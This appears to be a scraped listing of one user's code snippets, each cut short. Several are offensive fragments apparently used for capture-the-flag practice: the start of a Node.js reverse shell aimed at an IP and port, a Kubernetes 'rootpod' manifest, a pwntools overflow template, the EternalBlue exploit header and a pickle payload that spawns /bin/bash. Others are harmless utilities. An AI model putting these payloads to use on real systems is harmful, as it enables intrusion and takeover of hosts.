Reelix

// Step 1
// Use the following Code - Change the HOST / PORT as you need
// Modified from: https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
var net = require('net');
var spawn = require('child_process').spawn;
HOST="10.2.26.203";
PORT="9001";
TIMEOUT="5000";
if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
var client = new net.Socket();

Reelix

apiVersion: v1
kind: Pod
metadata:
  name: rootpod
spec:
  containers:
  - name: rootpod
    image: nginx # Pull from an existing pod
    imagePullPolicy: IfNotPresent
    volumeMounts:

Reelix

#!/bin/python3
import os, sys

# Argument
file = sys.argv[1]
print("Processing " + file)

filetype = os.popen('file ' + file).read()
print("Type: " + filetype)

Reelix

from pwn import *

### Change These ###
file_name = "./file.elf"
offset_loc = 48 # Buffer Overflow Val -> cyclic_find(b'kaaalaaa', n=4) # Buffer Overflow Val = RBP
isremote = True # Local or SSH?

### Uncomment + Change if local ###
# libc = ELF(''/lib/x86_64-linux-gnu/libc-2.27.so') # gdb ./file -> break main -> run -> info proc map

Reelix

#!/usr/bin/python3
from impacket import smb
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

Reelix

# Ref: https://davidhamann.de/2020/04/05/exploiting-python-pickle/
# Ref: https://frichetten.com/blog/escalating-deserialization-attacks-python/
# Note: Do not have a file in the directory named pickle.py or this will crash
import os
import pickle
import base64
class PickleSploit(object):
   def __reduce__(self):
      return (os.system, ('/bin/bash', ))
pickled = pickle.dumps(PickleSploit())

Reelix

# python3 -m pip install pycryptodome==3.4.3
from Crypto.Util.number import inverse, long_to_bytes
import decimal, binascii

# If you have the id_rsa.pub or equivalent
# ssh-keygen -f id_rsa.pub -e -m PKCS8 > id_rsa.pem

# If you have a private key (pem) file
# - http://certificate.fyicenter.com/2145_FYIcenter_Public_Private_Key_Decoder_and_Viewer.html
# -- Fill in n, e, d, p, q (Note: numeric values of n,d,p,q - Not displayed hex values)

Reelix

<?php
// File created by Reelix (HTB: Reelix)

// Enter your Host, username, password, database below.
$host = "localhost";
$dbuser = "dbusername";
$dbpass = "dbpassword";
$db = "";
$query = "";
if (isset($_GET["db"]))

Reelix

internal class Program
    {
        private static void Main(string[] args)
        {
            // https://code.google.com/archive/p/torchtools/wikis/TorchlightFileSpec.wiki
            Console.Title = "Reelix's TL1 Save Game Viewer";
            byte[] fileBytes = File.ReadAllBytes(@"C:\Users\Reelix\AppData\Roaming\runic games\torchlight\save\0.SVT");

            // Remove first 4 - Unsure
            fileBytes = RemoveFirstBytes(fileBytes, 4);

Reelix

class Program
{
    static void Main(string[] args)
    {
        List<double> exampleOne = new List<double> { 1, 3, 3, 6, 7, 8, 9 };
        List<double> exampleTwo = new List<double> { 1, 2, 3, 4, 5, 6, 8, 9 };
        List<double> exampleThree = new List<double> { 0, 1, 2, 4, 6, 5, 3 };
        double medianOne = exampleOne.Median();
        double medianTwo = exampleTwo.Median();
        double medianThree = exampleThree.Median();